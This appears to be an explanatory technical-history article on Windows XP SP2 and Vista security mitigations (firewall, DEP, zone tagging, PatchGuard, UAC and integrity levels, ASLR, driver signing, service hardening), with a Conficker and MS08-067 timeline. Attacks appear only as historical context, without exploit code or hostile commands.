A security control whose default configuration on a freshly installed or upgraded system is "active," not "available to be enabled." On-by-default mitigations reach approximately the entire installed base of a release; opt-in mitigations reach approximately the small fraction of users who actively configure them. The asymmetry is roughly two orders of magnitude in deployment reach, which is the engineering reason XP SP2 was treated as a re-release rather than as a service pack [@s-forshaw-projectzero-wfp].

The "5%/95%" framing is shorthand for the on-by-default-vs-opt-in asymmetry -- a two-orders-of-magnitude reach gap [@s-forshaw-projectzero-wfp] that motivated default-on Firewall, default-on DEP for system binaries, default-on Automatic Updates, and default-on UAC.

Here is the SP2 bundle as a table. The third column is the load-bearing one: every default-on choice in SP2 came with a real compatibility cost, and the article's later sections are partly the story of those costs being paid down.

SP2 mitigation	Attack class broken	Compatibility cost
Windows Firewall on by default	Worm-style unauthenticated TCP/445, TCP/135 RPC	Apps binding listening ports without firewall exception manifest
Data Execution Prevention	Stack and heap shellcode execution	First-generation JITs that wrote executable code into RW pages
AES + Zone.Identifier ADS	Outlook and IE auto-launch of attachments	Legitimate self-extracting installers from network shares
IE6 SP2 hardening	Drive-by ActiveX install, pop-up ad layers, MIME confusion	Line-of-business intranet ActiveX apps; legacy webmail pop-ups
Security Center	Status invisibility for non-technical users	Third-party AV vendors objected to display of competing status

Key idea: Once the 5%/95% threshold becomes the unit of analysis, the question changes. The question is no longer "what is the best mitigation we could ship?" It is "what mitigation will the user not turn off?" Every Vista feature in the next chapter is an answer to that question -- and every Vista feature that broke compatibility is the price the answer cost.

XP SP2 reached the broad public via Automatic Updates by late August 2004. By the end of the year Microsoft had pushed the largest single security update in the operating system's history onto roughly the entire XP installed base. The five mitigations that landed that day deserve their own catalogue.

4. The XP SP2 Mitigation Catalogue

XP SP2 shipped on August 6, 2004 and reached the broad public via Automatic Updates by late August. The five mitigations below are not equally famous, but they are equally load-bearing for what came next in Vista. Each subsection opens with what the mitigation broke (the attack class) and ends with what it broke (the compatibility cost).

4.1 Windows Firewall on by default

Pre-SP2, XP had something called the Internet Connection Firewall. It was off by default; it bound only to the interface flagged as the Internet connection during setup; and any application that wanted a listening port could simply listen on a different interface and never trigger it. The Blaster window -- the moment between a fresh XP installing on a network and Automatic Updates pulling MS03-026 -- was open for as long as DHCP plus the first reboot took, which on a 2003-era cable modem was about ninety seconds. Welchia exploited the same window in reverse.

The fix in SP2 was structural. The renamed Windows Firewall came on by default on every interface, was active during the boot sequence (before user-mode services finished initialising), and ran during a brief boot-time stateful inspection window before the regular policy engine took over [@s-forshaw-projectzero-wfp].

What this broke for compatibility: every legitimate application that bound a listening port without registering a firewall exception manifest. Domain join, the older SMB RPC paths, and a long list of corporate management tools needed exception entries pushed via Group Policy before they would work on freshly joined SP2 machines. The forward link is to Vista's Windows Filtering Platform in section 6.6, which gave third-party firewalls and IDS/IPS vendors a supported extension surface instead of forcing them to keep hooking NDIS.

4.2 Data Execution Prevention

Data Execution Prevention is the Windows trade name for refusing to execute instructions from pages marked as data. Hardware-enforced DEP uses the AMD NX bit ("No-eXecute") or the Intel XD bit ("eXecute Disable"), both shipped in commodity x86 silicon by 2004 -- the AMD64 Athlon 64 launched with the NX bit on September 23, 2003 [@s-wp-athlon-64], and Intel followed with XD on the Prescott Pentium 4 stepping in mid-2004.

Software-enforced DEP on CPUs without the bit relied on SafeSEH-based exception-handler validation, which closed the most common shellcode-staging pattern of the era (overwrite a saved exception handler on the stack, trigger an exception, jump into shellcode) without actually marking pages non-executable [@s-msft-sehop-kb956607]. SP2 introduced four configurations -- OptIn, OptOut, AlwaysOn, AlwaysOff -- selectable via boot.ini and later via BCD; the default on consumer XP was OptIn (system DLLs only) [@s-windows-internals-5e].

A defense that refuses to fetch and execute instructions from memory pages whose protection bits mark them as non-executable. Hardware-enforced DEP uses the NX page-table bit on x86 / x64 silicon (AMD's branding) or the XD bit (Intel's branding). Software-enforced DEP without the page bit relies on safe exception handlers (SafeSEH) to close the dominant stack-overflow exploitation pattern [@s-msft-sehop-kb956607]. Shipped in XP SP2 in August 2004 and refined repeatedly through Windows 10 [@s-windows-internals-5e]. A single bit in an x86 / x64 page table entry that, when set, instructs the CPU to fault on an instruction fetch from that page. AMD's name is NX (No-eXecute) and shipped first in 2003 on the Opteron; Intel's equivalent is XD (eXecute Disable). The bit is the hardware substrate for DEP and for the W^X (Write XOR Execute) memory policy that OpenBSD and PaX had pioneered earlier in the decade [@s-pax-aslr-live, @s-openbsd-3-4-wayback].

The academic prior art is older than DEP by six years. Crispin Cowan's StackGuard paper at the 7th USENIX Security Symposium in January 1998 [@s-cowan-stackguard] introduced the canary-based stack-overflow detector that the Visual C++ /GS flag adopted in 2002 with Visual Studio .NET [@s-msft-gs-buffer-security-check, @s-wp-vs] and that DEP complemented rather than replaced. On the Linux side, the PaX project had shipped W^X plus mmap-base randomization in 2003 [@s-pax-aslr-live, @s-pax-docs-index]. OpenBSD 3.4, released on November 1, 2003, was the first general-purpose operating system to ship integrated W^X plus library-load-order randomization default-on [@s-openbsd-3-4-wayback]. Vista's ASLR three years later was, by mainstream-OS standards, late.

The DEP-versus-JIT compatibility breakage is the canonical "good security default that breaks shipping software" story of the SP2 era. JavaScript engines, Java, .NET, and Flash all generated executable code into RW pages at runtime and ran headlong into DEP's first-generation policy. The modern fix is the explicit VirtualProtect transition (RW into RX and back) that every JIT now uses, but the engineering took years to converge across vendors. The next pass through the same problem -- W^X enforced by CPU mode in Apple silicon -- finally made the explicit-transition pattern a first-class API.

4.3 Attachment Execution Service and the Zone.Identifier ADS

This is the subsection that most retellings of XP SP2 get backwards. The Mark-of-the-Web -- the HTML comment of the form  that Internet Explorer reads on a saved web page to decide which security zone to apply -- did not ship with SP2. It shipped two years earlier in Internet Explorer 6 Service Pack 1 in 2002.

What SP2 added is the Attachment Execution Service: the system-wide enforcement substrate that, when a file arrives via Outlook, Outlook Express, Internet Explorer, Windows Messenger, or any caller of the IAttachmentExecute shell API [@s-msft-iattachmentexecute], writes a Zone.Identifier NTFS Alternate Data Stream tagging the file with its originating security zone.

The XP SP2 shell service that, on attachment download from a recognised zone-aware caller (Outlook, IE, Messenger, the `IAttachmentExecute` API [@s-msft-iattachmentexecute]), writes a `Zone.Identifier` NTFS Alternate Data Stream tagging the file with its originating zone (Internet, Restricted, Trusted, Local Intranet). AES is the system-wide enforcement substrate that materialised the existing Mark-of-the-Web concept into a persistent file-system record the Shell consults at execute time. Substrate, not ancestor. An NTFS Alternate Data Stream named `Zone.Identifier`, attached to a file by the Attachment Execution Service or its callers. The ADS body is a small INI file with a `[ZoneTransfer]` section whose `ZoneId` value (3 for Internet, 4 for Restricted, 2 for Trusted, 1 for Local Intranet, 0 for Local Machine) the Shell reads on execute attempts. The ADS persists with the file across copies on NTFS volumes; copying to FAT32 or onto a non-NTFS share strips it -- which is why USB sticks and consumer file-sharing services have historically been laundering paths for web-originated executables.

{ // Illustrative parser. The real call is to CreateFileW on a path of // the form "C:\\\\downloads\\\\foo.exe:Zone.Identifier", reading the // resulting stream as a tiny INI file. const adsContent = [ "[ZoneTransfer]", "ZoneId=3", "ReferrerUrl=example.com/", "HostUrl=example.com/downloads/foo.exe", ].join("\\n"); const zoneNames = { 0: "Local Machine", 1: "Local Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted" }; const lines = adsContent.split("\\n"); const kv = Object.fromEntries( lines.filter(l => l.includes("=")).map(l => l.split("="))); const zone = parseInt(kv.ZoneId, 10); console.log(\File originated from zone ${zone} (${zoneNames[zone]})`); console.log(`Referrer: ${kv.ReferrerUrl}`); `}

The architectural property the substrate produces is the one downstream tools cannot live without. Office Protected View opens with restricted privileges precisely when the document's Zone.Identifier reports Internet origin. SmartScreen warns on first execute of any binary whose ADS says Internet. Microsoft Defender Application Control treats Zone.Identifier as a first-class file attribute in its policy language. None of those tools would work the way they do if AES had not made the zone tag a persistent file-system property in 2004.

4.4 Internet Explorer 6 SP2 hardening

The IE6 SP2 hardening pass is the largest browser security delta in any service-pack-era Windows update before or since. The pop-up blocker on by default plus the Information Bar gave the browser a way to defer execution of script-launched popups behind an explicit user click. MIME-handling lockdown closed the MIME-sniffing attacks the Outlook MHTML class had enabled (an attacker could serve a binary as Content-Type: text/plain and have IE sniff and execute it anyway).

The Local Machine Zone lockdown blocked script execution from the LMZ by default for IE-rendered documents, closing the cross-zone elevation path that several earlier IE vulnerabilities had taught attackers to chain through mhtml: and file:// URL tricks. The ActiveX opt-in framework required user confirmation before any controls were installed from the Internet. The compatibility cost was real and immediate: legitimate ActiveX line-of-business intranet apps, legacy webmail pop-ups, and corporate intranet portals all required exemption configuration before they would keep working as before.

4.5 Security Center

Security Center is easy to underestimate because its UI looked like a Control Panel applet. It was the first centralised surface that aggregated three previously invisible state signals -- firewall status, Automatic Updates status, antivirus status (presence, definitions currency, real-time protection enabled) -- into a single interface a non-technical user could read.

The balloon-tip notification UI surfaced negative states aggressively; the visible degradation was the entire point. The third-party AV vendors -- Symantec and McAfee in particular -- objected publicly to Microsoft's display of competing status, and the resulting friction previewed the 2009 European Union agreement that constrained Microsoft's default-bundled-AV options for the rest of the era.

Three of these five mitigations made it into Vista substantially unchanged. Two of them -- the firewall and the ADS-based zone tagging -- were re-architected because Vista's threat model went past the application-on-the-network and into the application-on-the-desktop. To see why, we have to leave XP behind and walk year by year through what happened next.

5. Year by Year, 2005 Through 2009

If XP SP2 was the proof of concept for on-by-default mitigations, the next four years were the proof of work. Microsoft was shipping kernel self-protection, anti-exploit defenses, and the first real attempt at a privilege model the consumer would actually use. The security research community was learning faster than the shipping cadence could absorb. Two industry coordination moments and one wormable RCE close the period.

gantt dateFormat YYYY-MM-DD axisFormat %b %Y section Memos and process Trustworthy Computing memo :a1, 2002-01-15, 7d Security stand-down :a2, 2002-02-01, 60d SDL mandated at Microsoft :a3, 2004-09-01, 120d Mojave Experiment :a4, 2008-07-01, 30d section Windows releases XP SP2 :b1, 2004-08-06, 90d XP x64 and Server 2003 x64 :b2, 2005-04-25, 30d Vista RTM :b3, 2006-11-08, 14d Vista consumer GA :b4, 2007-01-30, 14d Vista SP1 RTM :b5, 2008-02-04, 14d Vista SP1 GA :b6, 2008-03-18, 14d Windows 7 RTM :b7, 2009-07-22, 14d Windows 7 GA :b8, 2009-10-22, 14d section Attacks Blaster :c1, 2003-08-11, 30d Welchia :c2, 2003-08-18, 30d Sasser :c3, 2004-04-30, 30d MS08-067 out-of-band patch :c4, 2008-10-23, 7d Conficker.A first detected :c5, 2008-11-20, 30d Conficker.C DGA expansion :c6, 2009-03-04, 30d section Research Cowan StackGuard USENIX :d1, 1998-01-26, 7d PaX ASLR design doc :d2, 2003-03-15, 7d OpenBSD 3.4 W^X plus library randomization :d3, 2003-11-01, 7d Shacham et al CCS 2004 ASLR analysis :d4, 2004-10-25, 7d Hoglund and Butler Rootkits book :d5, 2005-06-01, 7d skape and Skywing Uninformed Vol 3 :d6, 2005-12-01, 7d Symantec McAfee public PatchGuard objection :d7, 2006-10-01, 30d Ferguson BitLocker whitepaper :d8, 2006-08-01, 30d Shacham ROP CCS 2007 :d9, 2007-10-29, 7d Halderman cold-boot USENIX 2008 :d10, 2008-07-28, 7d Conficker Working Group forms :d11, 2009-02-12, 14d CWG Lessons Learned final :d12, 2010-06-17, 7d

5.1 April 2005: XP Professional x64 Edition and Server 2003 x64

Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition were the first Windows releases to ship Kernel Patch Protection -- the kernel self-defense mechanism widely known as PatchGuard. The common version of the story moves PatchGuard's debut to Vista by twenty months. It did not debut on Vista.

Microsoft Security Advisory 932596 (published August 14, 2007, updated April 23, 2008) is unambiguous: "An update is available for Kernel Patch Protection included with x64-based Windows operating systems" [@s-msft-adv-932596]. The x64-based qualifier is load-bearing. Vista x64 inherited PatchGuard v2 in November 2006; Vista SP1 x64 shipped v3 in February 2008. The x86 editions of Vista never got PatchGuard.

Microsoft's kernel-mode self-protection feature on x64 Windows. PatchGuard periodically verifies the integrity of a fixed list of kernel data structures (SSDT, IDT, GDT, MSRs, system images, the kernel's own code pages) and bug-checks the system on detected modification. Shipped first in April 2005 in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition. Vista x64 inherited it (v2 in Vista RTM, v3 in Vista SP1). Vista did NOT introduce PatchGuard [@s-msft-adv-932596].

The architectural target of PatchGuard is the 2003-era rootkit class catalogued in Hoglund and Butler's Rootkits: Subverting the Windows Kernel (Addison-Wesley, 2005) [@s-hoglund-butler-rootkits]: SSDT hooks, IDT hooks, inline patches of function prologues, modifications to the System Service Descriptor Table, manipulation of the Object Manager's namespace. The same April 2005 release also introduced advisory (warnings, not enforcement) kernel-mode driver signing. Mandatory kernel-mode driver signing arrived with Vista x64 a year and a half later [@s-msft-driver-signing].

5.2 October 2006: Symantec and McAfee object to PatchGuard in public

The first major public clash between kernel self-defense and the kernel-extension model that the antivirus industry had built businesses on came in October 2006, weeks before Vista RTM. Symantec and McAfee both took the position that PatchGuard would make their products materially less effective by closing off the kernel-mode hooking patterns their behavioural detection engines depended on [@s-wp-kpp].

Microsoft's response was to formalise the existing Cm, Ob, and Ps notification routines (registry, object-manager, and process callbacks) and the Filter Manager and Windows Filtering Platform callout architectures as supported extension surfaces. The pattern -- a kernel-integrity feature pressed up against existing AV business models, followed by a published callback API that gives the AV industry a supported path -- recurs with Driver Signature Enforcement in Vista x64, with Early Launch Antimalware in Windows 8, with HVCI in Windows 10 and 11, and with the Microsoft Vulnerable Driver Block list rollout from 2020 onward.

5.3 December 1, 2005: skape and Skywing's "Bypassing PatchGuard on Windows x64"

In December 2005, eight months after PatchGuard's debut, skape (Matt Miller) and Skywing (Ken Johnson) published "Bypassing PatchGuard on Windows x64" in Uninformed Vol. 3 [@s-skape-skywing-patchguard]. The paper is widely mis-cited: it is dated December 1, 2005 (the Uninformed volume publication is January 2006); it is co-authored, not single-authored; it has no subtitle. Upstream secondary references occasionally attribute the paper to Skywing alone with a July 2006 date and the subtitle "Bypassing Kernel Patch Protection on Windows x64." The corrected metadata is what the article uses.

The structural observation that any defense which runs at a given privilege level cannot fundamentally constrain an attacker who also runs at that privilege level. PatchGuard runs at ring 0; rootkits run at ring 0; therefore PatchGuard is bypassable in principle from a sufficiently privileged kernel-mode attacker. skape and Skywing's December 2005 *Uninformed* paper demonstrated three concrete bypass technique classes [@s-skape-skywing-patchguard]. The genuine architectural fix waits for hypervisor-protected mechanisms (HVCI in Windows 10 Anniversary Update, August 2016; VBS and Pluton in Windows 11) that run the integrity verifier from a more privileged execution mode than the attacker. Any defense that runs at the same privilege level as the attacker is fundamentally bypassable. -- paraphrased from the load-bearing conclusion of skape and Skywing, *Uninformed* Vol. 3, December 1, 2005 [@s-skape-skywing-patchguard]

5.4 November 8, 2006: Vista RTM

Windows Vista released to manufacturing on November 8, 2006. Volume-license availability via the Microsoft Volume Licensing portal began "sometime before Nov. 30, 2006" per the same-day Computerworld press-conference coverage [@s-lai-computerworld-vista-rtm]. Consumer general availability was January 30, 2007. Keep these as three distinct dates: the gap between RTM and consumer GA is where most enterprise IT departments tested compatibility, and where the volume-license customers who later complained loudest about Vista actually first encountered it.

5.5 January 30, 2007: Vista consumer GA and the reception

The pivot from technical release to cultural event happened in the first six months of 2007. Apple's "Get a Mac" television-spot series ran "Security" and "Cancel or Allow" through the summer, dramatizing UAC prompt fatigue for a mass audience [@s-wp-get-a-mac].

The Kelley v. Microsoft Corp. lawsuit (No. 2:07-cv-00475-MJP, W.D. Wash.) was filed on March 29, 2007 and certified as a class action in February 2008 [@s-cw-vista-capable-class], alleging that Microsoft had marketed machines as "Vista Capable" that could only run Home Basic without the Aero compositor or many of the security features the launch had highlighted. The Mojave Experiment in July 2008 -- Microsoft showing Vista to focus groups under a different name and getting positive reactions -- was the era's confession that the perceptual layer mattered as much as the architectural layer [@s-msft-mojave-experiment, @s-wp-mojave-experiment].

The Vista Capable case is Kelley v. Microsoft Corp., No. 2:07-cv-00475-MJP, W.D. Wash., filed March 29, 2007 and certified February 22, 2008 [@s-cw-vista-capable-class]. Coverage that condenses the timeline to "Vista launched and was sued" tends to misstate the filing month as April or May.

Was Vista the most-hated Windows release? Windows ME and Windows 8 have competing claims, and any honest treatment needs to acknowledge them. Call Vista one of the most poorly received Windows consumer releases of its era. The reception was uniquely consequential -- the SP1-era enterprise inertia, the consumer skipping that left a large XP-to-7 leap, and the marketing problem Windows 7's launch had to solve. The substantive argument does not depend on the superlative.

5.6 February 4, 2008: Vista SP1 RTM

Vista Service Pack 1 released to manufacturing on February 4, 2008, with broad availability starting March 18, 2008 [@s-msft-news-vista-sp1-rtm]. This is the "real Vista" enterprise IT deployed. PatchGuard v3 shipped with SP1. The file-copy engine got the performance fix that Vista's reviewers had spent a year complaining about. Windows Search was refactored to reduce IO contention with foreground work. A set of compatibility shims relaxed UAC on several common operations that had been hitting too many false-positive prompts.

Vista SP1 RTM is February 4, 2008 (build 6001.18000); broad GA is March 18, 2008 [@s-msft-news-vista-sp1-rtm]. Upstream summaries sometimes mis-state the RTM as November 2007 -- that date is actually the SP1 Release Candidate 1 milestone, not RTM.

5.7 October 23, 2008: MS08-067 out-of-band

The vulnerability behind MS08-067 is a stack buffer overflow in the path-handling code (the function commonly named NetprPathCanonicalize in the NetAPI library), reachable through the Server service's srvsvc RPC interface over SMB on TCP/445 (and TCP/139 in NetBT environments) without authentication. CVE-2008-4250 [@s-nvd-cve-2008-4250]. The patch is out-of-band because the MSRC analysts who reviewed the bug believed weaponisation was weeks away.

Vista's DEP and ASLR materially raised the cost of exploitation on Vista compared to XP -- the bulletin rates the issue Critical on Windows 2000, XP, and Server 2003 but Important on Vista and Server 2008 [@s-ms08-067]. The October 2008 installed base, however, was overwhelmingly Server 2003 and XP. The first in-the-wild MS08-067 exploitation in October 2008 was Gimmiv.A, a narrower non-self-propagating Trojan, per NVD [@s-nvd-cve-2008-4250]. Conficker was three weeks away.

5.8 Late November 2008: Conficker.A is first detected

Conficker.A was first detected in late November 2008, anchored to November 20, 2008 in SRI International's "An Analysis of Conficker C" addendum, whose introductory paragraph reads: "Conficker malware family, which first appeared on the Internet on 20 November 2008" [@s-sri-conficker-c-addendum]. The gap from MS08-067 to Conficker.A is approximately twenty-nine days. The October-2008 in-the-wild MS08-067 exploitation was Gimmiv.A; Conficker is a separate, later, much larger event.

The audit-mandated date correction: Conficker.A first detected in late November 2008, with November 20, 2008 as the canonical SRI anchor [@s-sri-conficker-c-addendum]. The October-2008 in-the-wild MS08-067 exploitation reported in NVD is Gimmiv.A, not Conficker [@s-nvd-cve-2008-4250].

5.9 December 2008 through April 2009: Conficker.B, C, E

The variant taxonomy matters because it is the evidence base for how quickly the worm's authors learned, and how the Conficker Working Group's coordinated defense responded. Conficker.B in late December 2008 added removable-drive autorun spreading, a dictionary attack against weak shares, and a fallback exploit path against the older MS06-040 vulnerability for the small fraction of targets that were still unpatched against it.

Conficker.A already had a 250-domain-per-day Domain Generation Algorithm; what Conficker.C added on March 4, 2009 at 6 p.m. PST (March 5 UTC) was a 50,000-domain-per-day rendezvous-pool expansion across 110 top-level domains and a peer-to-peer coordination channel that no longer required successful DNS rendezvous -- two functional additions of the same variant, not two sequential revisions. The SRI "An Analysis of Conficker C" addendum is explicit on this: variant C "incorporates a major restructuring of B's previous thread architecture and program logic, including major functional additions such as a new peer-to-peer (P2P) coordination channel, and a revision of the domain generation algorithm (DGA)" [@s-sri-conficker-c-addendum]. Conficker.E, in April 2009, added payload-delivery for scareware and the Waledac spam botnet; the in-era variant chain runs A to B to C to E, matching both the SRI primary and the CWG taxonomy.

Conficker.B's MS06-040 fallback exploit path was scoped to Windows 2000 targets only -- the older bulletin's RCE vector did not reach the post-2003 SMB stack the same way. The Conficker Working Group taxonomy is sometimes summarised in ways that imply the MS06-040 fallback was a broader secondary attack vector; it was not.

5.10 February 12, 2009: Conficker Working Group and the $250,000 bounty

On February 12, 2009 Microsoft posted a US$250,000 bounty for information leading to the arrest and conviction of Conficker's authors, and the Conficker Working Group formally constituted itself as a coordinated industry response -- Microsoft, ICANN, F-Secure, Symantec, Verisign, Georgia Tech, and roughly 120 other participating organisations [@s-cwg-lessons-learned-2019].

The CWG's "Lessons Learned" final report (June 17, 2010) is the canonical post-mortem primary that the rest of this article relies on for variant taxonomy, infection-count framing, and the deployment-velocity-ceiling argument [@s-cwg-lessons-learned-2019]. The 9-to-15-million infected machines figure is the report's own range; counts varied with measurement methodology and with which Conficker variants the counter included.SRI International's per-country infection table from the same period shows the geographic distribution: China (about 2.65M observed bots), Brazil (about 1.02M), Russia (about 836K), India (about 607K), Argentina (about 569K) topping the list [@s-sri-conficker-resources]. The distribution tracked installed-base size of unpatched XP and Server 2003 closely.

Vista shipped on November 8, 2006 and the world made up its mind about the reception by mid-2007. To understand why the architecture survived the reception, we have to look at what the architecture actually was -- feature by feature -- and what each feature defended against.

6. The Vista Security Catalogue

Open Windows Internals, 5th edition (Russinovich, Solomon, and Ionescu, Microsoft Press, 2009) [@s-windows-internals-5e] to the security chapter and the table of contents reads like a list of features Microsoft did not have eighteen months earlier. Eight features in particular form the Vista security architecture, not because they were the only changes, but because every other Vista security improvement either depends on one of these or polishes one of these.

6.1 The integrity-level stack: UAC, MIC, and UIPI

User Account Control is the consumer-visible part. Underneath sit two architectural primitives that do almost all the work: Mandatory Integrity Control and User Interface Privilege Isolation.

UAC's split-token model works like this. When an interactive user logs on whose group membership includes Administrators, the Local Security Authority issues two access tokens, not one. The filtered token has Administrators removed (more precisely, marked deny-only) and the high-privilege list stripped down to the standard-user set; the full token retains everything.

The user session starts running under the filtered token by default. When a program tries to perform an operation that requires the full token -- writing under %ProgramFiles%, modifying HKLM, loading a driver -- the Application Information service displays a Secure Desktop consent prompt. On consent, the full token is released for that process only; the rest of the session continues on the filtered token.

The Vista feature that runs interactive administrator accounts under a filtered standard-user token by default and prompts for explicit consent before releasing the full administrator token to a specific process. The Secure Desktop switch isolates the consent prompt from window-message injection by lower-integrity processes. Russinovich is explicit in the load-bearing primary: elevations were introduced as a convenience, and their existence "prevents OTS elevations from being a security boundary" [@s-russinovich-uac-technet]. The boundary classification arrives much later with Administrator Protection in the 2024 to 2026 Windows 11 era.

Mandatory Integrity Control adds the second axis the discretionary-access-control model never had. Every process token carries an integrity-level SID drawn from a small set -- Untrusted S-1-16-0, Low S-1-16-4096, Medium S-1-16-8192, High S-1-16-12288, System S-1-16-16384 -- and every securable object carries an integrity-level access control entry indicating the minimum integrity required to write (and optionally read or execute). The kernel's access check evaluates integrity before the discretionary ACL [@s-msft-mic-win32]. A Low-integrity process holding a handle to a Medium-integrity registry key cannot write to it regardless of what the DACL says.

Vista's mandatory-access-control primitive added to the Windows access-check pipeline. MIC attaches an integrity-level SID to every process token and an integrity-level ACE to every securable object, then evaluates the integrity comparison before the discretionary access control list. MIC is the architectural substrate every later Windows containment story (AppContainer, Modern Apps, browser sandbox, Office Protected View, WDAG, VBS) inherits [@s-msft-mic-win32].

User Interface Privilege Isolation closes the third class of cross-integrity attack: window-message injection. Before UIPI, any process in the same desktop could send window messages (SendMessage, PostMessage, WM_TIMER, SetWindowsHookEx) to any other process's windows, including elevated ones. Chris Paget's 2002 "shatter attack" paper had walked through the attack surface methodically. UIPI prevents a lower-integrity process from sending most messages to higher-integrity windows; the Secure Desktop completes the closure for the consent UI itself by drawing it on a separate desktop the user-session processes cannot reach.

Vista's mechanism preventing lower-integrity processes from sending window messages (SendMessage, PostMessage, SetWindowsHookEx, WM_TIMER, etc.) to higher-integrity windows on the same desktop. Closes the shatter-attack class documented by Chris Paget in 2002. Together with the Secure Desktop, UIPI is the closure that makes the UAC consent prompt actually resistant to programmatic dismissal from a malware process running in the same user session. flowchart TD A[Interactive logon as Administrator] --> B[LSA splits token] B --> C[Filtered standard-user token] B --> D[Full administrator token held aside] C --> E[User session starts under filtered token] E --> F[Program requests admin operation] F --> G[Application Information service intercepts] G --> H[Secure Desktop switch] H --> I[UAC consent prompt] I --> J{"Consent?"} J -- Yes --> K[Full token released to this process only] J -- No --> L[Operation denied] K --> M[Process runs at High integrity] L --> E

Russinovich's "Inside Windows Vista User Account Control" in TechNet Magazine June 2007 is the canonical primary on design intent [@s-russinovich-uac-technet]; a separate Mark's-Blog post dated February 12, 2007 anchored the multi-part TechNet blog series on PsExec and the restricted-token discussion [@s-russinovich-psexec-blog]. The two are distinct primaries and the article does not conflate them.

The TechNet Magazine UAC article is a single standalone piece at asset id cc138019 [@s-russinovich-uac-technet]. There is a separately numbered Magazine asset at cc162493 that is sometimes mis-cited as "Part 2" of the UAC series; live fetches of that URL return an unrelated Raymond Chen column. The article cites cc138019 only and treats the February 12, 2007 blog post as the start of the distinct multi-part blog series.

6.2 Anti-exploit mitigations: ASLR and Vista-era DEP refinements

Vista is the first Windows release to ship Address Space Layout Randomization. Vista's ASLR randomizes the load address of system DLLs and of executables linked with /DYNAMICBASE; it is opt-in for user code. Mandatory ASLR for all images is a later-Windows feature, with Force ASLR appearing in EMET and in Windows 8, and full enforcement landing in Windows 10. The randomization is per-boot for system images and per-process-load for user images. Entropy on x86 is roughly 8 bits (256 possible base addresses), and considerably more on x64.

A defense that randomizes the base addresses of executable images, libraries, the stack, and the heap so attackers cannot predict the location of useful code or data. Vista (January 2007) was the first Windows release to ship ASLR; Vista's implementation randomized system DLLs and `/DYNAMICBASE`-linked user images, with per-boot randomization for system images and per-process-load randomization for user images. The Linux-side prior art is PaX [@s-pax-aslr-live, @s-pax-docs-index], and OpenBSD 3.4 (November 1, 2003) was the first general-purpose OS to ship integrated W^X plus library-load-order randomization default-on [@s-openbsd-3-4-wayback]. The brute-force entropy bound is the Shacham et al. CCS 2004 result [@s-shacham-asrandom-ccs2004].

The Shacham et al. CCS 2004 paper showed that 8 bits of ASLR entropy yields an expected $2^{7} = 128$ attempts to brute-force the base on a target process that respawns after crash [@s-shacham-asrandom-ccs2004]. The result is why x64 ASLR (with substantially more bits of entropy) is qualitatively different and why Force ASLR in Windows 8 was a categorical improvement over Vista's opt-in model.

The DEP refinements in Vista are mostly about loader cooperation. Vista's PE loader respects the IMAGE_DLLCHARACTERISTICS_NX_COMPAT flag, so binaries that opt in to DEP get the policy applied without per-process configuration. SEHOP (Structured Exception Handler Overwrite Protection) precursor work also lands.

Three years later, Hovav Shacham's CCS 2007 paper on Return-Oriented Programming will show that DEP alone is necessary but not sufficient: an attacker who cannot inject and execute new code can still chain together existing executable-code "gadgets" from already-loaded modules to construct functional payloads [@s-shacham-rop-geometry-ccs2007]. That insight is what drives the next generation of Windows mitigations -- CFG, CET, /GUARD:EH -- but those are out of era.

6.3 Kernel self-protection on x64: inherited PatchGuard, new mandatory KMCS

Vista did not introduce PatchGuard; it inherited the April 2005 x64 mechanism. What Vista x64 did introduce is mandatory kernel-mode driver signing. Unsigned drivers do not load on Vista x64 under the Kernel-Mode Code Signing policy.

The documented escape hatch for development is bcdedit /set testsigning on, which causes the boot loader to honour test-signing-rooted certificates and which displays a permanent desktop watermark to make the state of the machine visible. Together with the inherited PatchGuard, the combination foreclosed the dominant 2003-era rootkit installation path: drop a .sys, register it via SCM, kernel loads it with no signature check, kernel hooks become trivial [@s-msft-driver-signing].

The Vista x64 policy that refuses to load kernel-mode drivers unless they carry a digital signature rooted in a Microsoft-trusted certificate chain (Microsoft WHQL, a cross-certified third-party CA, or a Microsoft Hardware certificate). `bcdedit /set testsigning on` is the documented development-time escape hatch. Vista x86 never received mandatory KMCS, which is one of the structural reasons x64 became the dominant Windows architecture during the next decade [@s-msft-driver-signing].

x86 Vista did not get mandatory KMCS, because the installed-base compatibility cost was deemed too high; the x86 / x64 asymmetry is one reason x64 became the dominant Windows architecture by 2010. The post-2010 afterlife is "Bring Your Own Vulnerable Driver" attacks: KMCS forecloses unsigned drivers but does not address the case of a legitimately signed driver containing a vulnerability the attacker exploits to gain kernel-mode code execution. BYOVD became the dominant rootkit-loading path from approximately 2010 onward, and the Microsoft Vulnerable Driver Block list (2020 onward) is the architectural response.

The post-KMCS attack pattern in which an attacker installs a legitimately signed kernel-mode driver that contains an exploitable vulnerability, then exploits the driver to gain ring-0 code execution. KMCS forecloses the unsigned-driver path but does not prevent loading of signed drivers, so attackers brought their own. Architectural closure waits for the Microsoft Vulnerable Driver Block list and Hypervisor-Protected Code Integrity, both of which post-date this article's era.

6.4 Service Hardening

Service Hardening is the Vista feature that most reduced the blast radius of a service-level exploit even when exploitation succeeded. Three changes did the work. Per-service SIDs of the form NT SERVICE\<servicename> give every service a distinct security principal -- the previous model was that every service running as LocalSystem shared the same identity.

NT AUTHORITY\WRITE RESTRICTED tokens constrain a service to writing only to resources whose DACL explicitly grants its per-service SID, even when the service token nominally has higher privileges. Minimum-privilege configuration replaces the historical LocalSystem superset; the SCM lets services declare exactly which privileges they require. And Windows Firewall rules can be authored per-service-SID, so a compromised service can be blocked from reaching the network even if the rest of the box can. The print primary is Windows Internals, 5th edition (Russinovich, Solomon, Ionescu, Microsoft Press, 2009) [@s-windows-internals-5e].

A security identifier of the form `NT SERVICE\` distinct to each Windows service, automatically derived from the service short name. Per-service SIDs are the primitive that lets a host firewall rule, a `WRITE RESTRICTED` token policy, or a registry-key DACL constrain a single service without affecting any other service in the same `svchost.exe` process or any other principal sharing the same logon SID.

6.5 Windows Resource Protection

Windows Resource Protection replaces Windows File Protection (the Windows 2000-era SFC mechanism), whose model was "the OS keeps a hidden catalog of canonical copies and silently replaces tampered system files." WRP is ACL-based instead. Protected files and registry keys are owned by the TrustedInstaller SID; the DACL grants modify rights only to TrustedInstaller. Administrators retain read access and can take ownership, but they cannot modify protected resources directly without that ownership transfer. The protection extends to registry keys, which WFP/SFC did not cover [@s-windows-internals-5e].

